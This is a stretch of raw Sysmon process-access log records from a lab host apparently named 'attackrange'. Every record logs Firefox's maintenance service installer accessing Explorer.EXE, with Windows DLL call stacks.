Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3 10341000x800000000000000016259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 
